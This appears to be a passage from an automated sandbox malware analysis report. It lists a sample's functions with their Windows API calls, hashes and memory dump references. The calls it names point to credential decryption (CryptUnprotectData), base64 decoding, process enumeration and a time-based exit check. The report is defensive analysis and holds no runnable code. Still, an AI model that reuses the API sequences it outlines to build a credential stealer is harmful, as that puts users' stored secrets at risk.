                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -o{$!Iy$43Q'$M'Y|$wXfJ$woI@
                          • API String ID: 0-2881124228
                          • Opcode ID: 00286a74cbf312e639e6e19dbf20347e4b3c9828433e6f99751cac760988ae5c
                          • Instruction ID: e33cb09e347a91783c55cc32dc6b349f391f9c2e03fd581969b6d8277c0b6b66
                          • Opcode Fuzzy Hash: 00286a74cbf312e639e6e19dbf20347e4b3c9828433e6f99751cac760988ae5c
                          • Instruction Fuzzy Hash: 2EB229F360C2009FE3086E2DEC8567BB7EAEBD4320F1A853EE6C5C7744E97558058696
                          Function 0075134A Relevance: 9.2, Strings: 6, Instructions: 1664COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !1vS$%5Q$jOvW$s/7W$vo??$~m_
                          • API String ID: 0-1724610977
                          • Opcode ID: 3f2f63936ce745fe09b0509dbbcfd2bd1fcfe5fdb12e50ed30e20dbe5fad5410
                          • Instruction ID: 4f61cc93ceefe0af48539b4f1314b0ca90c0a2270af58836c216e145aae29fc7
                          • Opcode Fuzzy Hash: 3f2f63936ce745fe09b0509dbbcfd2bd1fcfe5fdb12e50ed30e20dbe5fad5410
                          • Instruction Fuzzy Hash: EDB2E5F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A493DE6C5C3744EA3558418696
                          Function 0074C185 Relevance: 9.1, Strings: 6, Instructions: 1611COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /<^?$RT?$o%w^$p[M$zJKG${Fo
                          • API String ID: 0-3244588706
                          • Opcode ID: ae0cf292bdd105c78308832a65b9307decff075947dd08d3ded84aa1c9484c60
                          • Instruction ID: 50ea7d9d451d094637504ce056c534b6752643fc04bfbfe50c22a11dca799307
                          • Opcode Fuzzy Hash: ae0cf292bdd105c78308832a65b9307decff075947dd08d3ded84aa1c9484c60
                          • Instruction Fuzzy Hash: A3B216F350C2049FE3046E2DEC8567AFBE9EF94320F16493DEAC487744EA7558058697
                          Function 00389AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                          • LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: N8
                          • API String ID: 4291131564-2731101833
                          • Opcode ID: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                          • Instruction ID: f8444c4544b980b999141e07d1bf4384ce49e32a21bf69f7758c6885d4c407b2
                          • Opcode Fuzzy Hash: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                          • Instruction Fuzzy Hash: C911D2B4241308EFEB01CF64CC95FAA77B5FB89704F208089F9159B390C7B2AA01DB90
                          Function 00743954 Relevance: 7.9, Strings: 5, Instructions: 1659COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /\r_$GKMw$\"~"${B}$I{g
                          • API String ID: 0-2058498375
                          • Opcode ID: 1e458ab8c7a638b002003641484b82b7fb44a8bd5f38985aaa0ce58b713cefe2
                          • Instruction ID: ed63f0980ee13650a3bc8ff30025ec98f777b210ff7c349ed7ff4e79e1aaea8b
                          • Opcode Fuzzy Hash: 1e458ab8c7a638b002003641484b82b7fb44a8bd5f38985aaa0ce58b713cefe2
                          • Instruction Fuzzy Hash: 9EB205F360C2049FE304AE2DEC8567AFBE9EB94620F16493DE6C5C7744EA3598058793
                          Function 00745433 Relevance: 7.9, Strings: 5, Instructions: 1610COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 00cfg$U*k=$U*k=$a,T_$pvXp
                          • API String ID: 0-3089016586
                          • Opcode ID: 935e6dd924ab31ae7dc04694eda2dd8a268117abb1362a29f14db52437e24f2c
                          • Instruction ID: 6888594835362c84f3ffaa971920c2c84eaf7c17177b2ca844aa979d3bfdfee2
                          • Opcode Fuzzy Hash: 935e6dd924ab31ae7dc04694eda2dd8a268117abb1362a29f14db52437e24f2c
                          • Instruction Fuzzy Hash: CBB226F3A0C2149FE7046E2DEC8567ABBE5EF94320F1A463DEAC5C7744EA3558058683
                          Function 0038C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                          • lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                          • lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                          • lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: f966b66c90ada5ffe798ba4505516abd0205e83baeef2c0892f5b7edc2e26e91
                          • Instruction ID: 5969d1abf273983c2598302fee79e8192f9195f0aabe9a2e2e6d80712fbef650
                          • Opcode Fuzzy Hash: f966b66c90ada5ffe798ba4505516abd0205e83baeef2c0892f5b7edc2e26e91
                          • Instruction Fuzzy Hash: C9416E74D1421EDFDB10DFA4DD89FEEBBB8BB48308F1041A8E509A6280D7705A84DFA1
                          Function 00396920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0039696C
                          • sscanf.NTDLL ref: 00396999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969C0
                          • ExitProcess.KERNEL32 ref: 003969DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                          • Instruction ID: 1c0d60252d1f48ffed597e5a55ad1bf9d586b779a637d7e427829fae7fb44487
                          • Opcode Fuzzy Hash: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                          • Instruction Fuzzy Hash: CD21EA75D1420CAFCF05EFE4D945DEEBBB5BF48304F04852AE406A3250EB345609DBA9
                          Function 00387240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0038724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00387254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00387281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003872A4
                          • LocalFree.KERNEL32(?), ref: 003872AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                          • Instruction ID: a1473e8d7eb55f4590928e8e807310a642b398fb03e812cecbd6613e7de44a77
                          • Opcode Fuzzy Hash: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                          • Instruction Fuzzy Hash: DC011275A40308BFEB14DFE4CD4AF9D7BB8EB44704F104555FB05AB2C0D670AA049B65
                          Function 00399600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0039961E
                          • Process32First.KERNEL32(003A0ACA,00000128), ref: 00399632
                          • Process32Next.KERNEL32(003A0ACA,00000128), ref: 00399647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0039965C
                          • CloseHandle.KERNEL32(003A0ACA), ref: 0039967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                          • Instruction ID: 92001967a9b51b1a9a1caa7c455302ce4578fb0f9cb137820c98b675791336ed
                          • Opcode Fuzzy Hash: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                          • Instruction Fuzzy Hash: 6801E5B5A00208AFCF15DFA9CD48BEDBBF8EB58314F104189A90AA6240EB349A44DF51
                          Function 0074A922 Relevance: 6.4, Strings: 4, Instructions: 1394COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /h.}$V!8$px<$K[
                          • API String ID: 0-2983324175
                          • Opcode ID: a9579365901a9486a69c35c83b27b4923d1f3ca9dfc1ac411bee77b77db17b35
                          • Instruction ID: d1658e9c077d4ad847d8a6e3f319a7475ed6a717c2964abd0c5de62f4f571a8f
                          • Opcode Fuzzy Hash: a9579365901a9486a69c35c83b27b4923d1f3ca9dfc1ac411bee77b77db17b35
                          • Instruction Fuzzy Hash: AF92E5F350C6049FE304AE2DEC8567AFBE9EF94720F1A493DEAC4C7740E63598058696
                          Function 00398EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00385184,40000001,00000000,00000000,?,00385184), ref: 00398EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
